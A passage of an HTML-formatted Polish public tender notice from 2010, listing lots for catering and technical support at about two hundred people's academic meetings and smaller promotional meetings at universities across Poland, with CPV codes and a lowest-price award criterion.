<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Część IX.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 9 części zamówienia obejmuje usługę cateringową podczas spotkania akademickiego na Uniwersytecie Szczecińskim - przewidywany termin realizacji spotkania - 23.09.2010 r.
Zamawiający oczekuje dostawy posiłków w ramach usługi cateringowej dla około 200 osób. Szczegółowy opis przedmiotu zamówienia stanowi załąćznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Część X.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 10 części zamówienia obejmuje usługę cateringową podczas spotkania akademickiego na Politechnice Łódzkiej - przewidywany termin realizacji spotkania - 24.09.2010 r.
Zamawiający oczekuje dostawy posiłków w ramach usługi cateringowej dla około 200 osób. Szczegółowy opis przedmiotu zamówienia stanowi załąćznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Część XI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 11 części zamówienia obejmuje usługę cateringową podczas spotkania akademickiego na Uniwersytecie Adama Mickiewicza w Poznaniu - przewidywany termin realizacji spotkania - 29.09.2010 r.
Zamawiający oczekuje dostawy posiłków w ramach usługi cateringowej dla około 200 osób.Szczegółowy opis przedmiotu zamówienia stanowi załąćznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Część XII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 12 części zamówienia obejmuje usługę cateringową podczas spotkania akademickiego na Uniwersytecie Mikołaja Kopernika w Toruniu - przewidywany termin realizacji spotkania - 19.11.2010 r.
Zamawiający oczekuje dostawy posiłków w ramach usługi cateringowej dla około 200 osób. Szczegółowy opis przedmiotu zamówienia stanowi załąćznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Część XIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 13 części zamówienia obejmuje usługę cateringową podczas spotkania akademickiego w Państwowej Wyższej Szkole Zawodowej w Suwałkach- przewidywany termin realizacji spotkania -  06.10.2010 r.
Zamawiający oczekuje dostawy posiłków w ramach usługi cateringowej dla około 200 osób. Szczegółowy opis przedmiotu zamówienia stanowi załąćznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Część XIV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 14 części zamówienia obejmuje usługę cateringową podczas spotkania akademickiego w Państwowej Wyższej Szkole Zawodowej w Pile - przewidywany termin realizacji spotkania - 07.10.2010 r.
Zamawiający oczekuje dostawy posiłków w ramach usługi cateringowej dla około 200 osób. Szczegółowy opis przedmiotu zamówienia stanowi załąćznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Część XV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 15 części zamówienia obejmuje usługę cateringową podczas spotkania akademickiego na Uniwersytecie Śląskim w Katowicach - przewidywany termin realizacji spotkania - 12.10.2010 r.
Zamawiający oczekuje dostawy posiłków w ramach usługi cateringowej dla około 200 osób. Szczegółowy opis przedmiotu zamówienia stanowi załąćznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Część XVI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 16 części zamówienia obejmuje usługę cateringową podczas spotkania akademickiego na Politechnice Lubelskiej - przewidywany termin realizacji spotkania - 14.10.2010 r.
Zamawiający oczekuje dostawy posiłków w ramach usługi cateringowej dla około 200 osób. Szczegółowy opis przedmiotu zamówienia stanowi załąćznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Część XVII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 17.	Zakres przedmiotowy dotyczący 17 części zamówienia obejmuje usługę cateringową podczas spotkania akademickiego na Politechnice Wrocławskiej - przewidywany termin realizacji spotkania - 22.10.2010 r.
Zamawiający oczekuje dostawy posiłków w ramach usługi cateringowej dla około 200 osób. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Część XVIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 18 części zamówienia obejmuje usługę cateringową podczas spotkania akademickiego w Państwowej Wyższej Szkole Zawodowej w Wałbrzychu - przewidywany termin realizacji spotkania - 26.10..2010 r.
Zamawiający oczekuje dostawy posiłków w ramach usługi cateringowej dla około 200 osób. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Część XIX.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 19 części zamówienia obejmuje usługę cateringową podczas spotkania Politechnice Opolskiej - przewidywany termin realizacji spotkania - 27.10.2010 r.
Zamawiający oczekuje dostawy posiłków w ramach usługi cateringowej dla około 200 osób. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Część XX.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 20 części zamówienia obejmuje usługę cateringową podczas spotkania akademickiego na Politechnice Świętokrzyskiej w Kielcach - przewidywany termin realizacji spotkania - 26.10.2010 r.
Zamawiający oczekuje dostawy posiłków w ramach usługi cateringowej dla około 200 osób. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Część XXI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 21 części zamówienia obejmuje usługę cateringową podczas spotkania akademickiego na Zielonogórskim  - przewidywany termin realizacji spotkania - 18.10.2010 r.
Zamawiający oczekuje dostawy posiłków w ramach usługi cateringowej dla około 200 osób. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> część XXII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 22 części zamówienia obejmuje usługę cateringową podczas spotkania akademickiego na Uniwersytecie Marii Curie Skłodowskiej w Lublinie - przewidywany termin realizacji spotkania - 25.10.2010 r.
Zamawiający oczekuje dostawy posiłków w ramach usługi cateringowej dla około 200 osób. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Część XXIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 23 części zamówienia obejmuje  cateringową i usługę wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na:
1.	 Uniwersytecie Gdańskim - przewidywany termin realizacji spotkania - październik 2010 r.
2.	Politechnika Gdańska - przewidywany termin realizacji spotkania - październik 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz usługi wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Część XXIV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 24 części zamówienia obejmuje usługę cateringową i wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na:
1.	 Politechnice Łódzkiej przewidywany termin realizacji spotkania -grudzień 2010 r.
2.	Uniwersytecie Łódzkiem lub AH w Łodzi przewidywany termin realizacji spotkania - grudzień 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz usługi wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Część XXV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 25 części zamówienia obejmuje usługę cateringową i wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego w Państwowej Wyższej Szkole Zawodowej w Elblągu - przewidywany termin realizacji spotkania -październik 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz obsługi organizacyjno - technicznej podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni.
Szczegółowy opis przedmioty zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> część XXVI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 26 części zamówienia obejmuje usługę cateringową wsparcia i technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na Uniwersytecie Warmińsko Mazurskim w Olsztynie- przewidywany termin realizacji spotkania - październik 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz obsługi organizacyjno - technicznej podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni.
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Część XXVII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 27 części zamówienia obejmuje usługę organizacyjno - techniczną i cateringową podczas spotkania informacyjno - promocyjno - konsultacyjnego na Akademii Podlaskiej w Siedlcach - przewidywany termin realizacji spotkania - październik 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługę cateringową dla około 80 osób i wsparcia i technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Część XXVIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 28 części zamówienia obejmuje usługę organizacyjno - techniczną i cateringową podczas spotkania informacyjno - promocyjno - konsultacyjnego na Politechnice Koszalińskiej- przewidywany termin realizacji spotkania - październik 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługę cateringową dla około 80 osób i wsparcia i technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni.
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Część XXIX.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 29 części zamówienia obejmuje usługę organizacyjno - techniczną i cateringową podczas spotkania informacyjno - promocyjno - konsultacyjnego na:
1.	 Zachodniopomorskim Uniwersytecie Technologicznym w Szczecinie - przewidywany termin realizacji spotkania -październik 2010 r.
2.	Uniwersytecie Szczecińskim- przewidywany termin realizacji spotkania - październik 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz usługę wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Część XXX.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 30 części zamówienia obejmuje usługę cateringową iwsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na Politechnice lub Uniwersytecie Przyrodniczym w Poznaniu- przewidywany termin realizacji spotkania -  październik 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz obsługi wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni.
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Część XXXI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 31 części zamówienia obejmuje usługę cateringową i wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na  Uniwersytecie Zielonogórskim - przewidywany termin realizacji spotkania - październik 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz obsługi organizacyjno - technicznej podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Część XXXII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 32 części zamówienia obejmuje usługę organizacyjno - techniczną i cateringową podczas spotkania informacyjno - promocyjno - konsultacyjnego w Państwowej Wyższej Szkole Zawodowej w Gorzowie - przewidywany termin realizacji spotkania - październik 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz usługi wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 33 <b>NAZWA:</b> Część XXXIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 33 części zamówienia obejmuje usługę cateringową i wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na Uniwersytecie Śląskim w Katowicach - przewidywany termin realizacji spotkania - październik 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz obsługi organizacyjno - technicznej podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 34 <b>NAZWA:</b> Część XXXIV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 34 części zamówienia obejmuje usługę cateringową i wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na Akademii Techniczno Humanistycznej w Bielsku- Białej - przewidywany termin realizacji spotkania - październik 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz usługi wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 35 <b>NAZWA:</b> Część XXXV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 35 części zamówienia usługę cateringową i wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na Uniwersytecie Opolskim - przewidywany termin realizacji spotkania - październik 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz obsługi organizacyjno - technicznej podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 36 <b>NAZWA:</b> Część XXXVI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 36 części zamówienia obejmuje usługę cateringową i wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na Uniwersytecie Wrocławskim- przewidywany termin realizacji spotkania - październik 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz obsługi organizacyjno - technicznej podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. Szczegółowy opis przedmiotu zamowienia zawiera załącznik nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 37 <b>NAZWA:</b> Część XXXVII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotowy dotyczący 37 części zamówienia obejmuje usługę cateringową iwsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na Uniwersytecie Kazimierza Wielkiego w Bydgoszczy - przewidywany termin realizacji spotkania - listopad 2010 
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz obsługi organizacyjno - technicznej podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 38 <b>NAZWA:</b> Część XXXVIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 38.	Zakres przedmiotowy dotyczący 38 części zamówienia obejmuje usługę cateringową i wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego na Uniwersytecie Mikołaja Kopernika w Toruniu - przewidywany termin realizacji spotkania -listopad 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz obsługi organizacyjno - technicznej podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. Szczegółowy opis przedmiotu zamówienia zawiera załacznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 39 <b>NAZWA:</b> Część XXXIX.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 39.	Zakres przedmiotowy dotyczący 39 części zamówienia obejmuje usługę cateringową i wsparcia technicznego podczas spotkania informacyjno - promocyjno - konsultacyjnego w Wyższej Szkole Ekonomiczno Humanistycznej w Płocku lub Włocławku - przewidywany termin realizacji spotkania -listopad 2010 r.
Zamawiający w tej części zamówienia oczekuje dostawy posiłków w ramach usługi cateringowej dla około 80 osób oraz obsługi organizacyjno - technicznej podczas spotkania informacyjno - promocyjno - konsultacyjnego na uczelni. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 71.35.63.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 40 <b>NAZWA:</b> Część XXXX.</p>
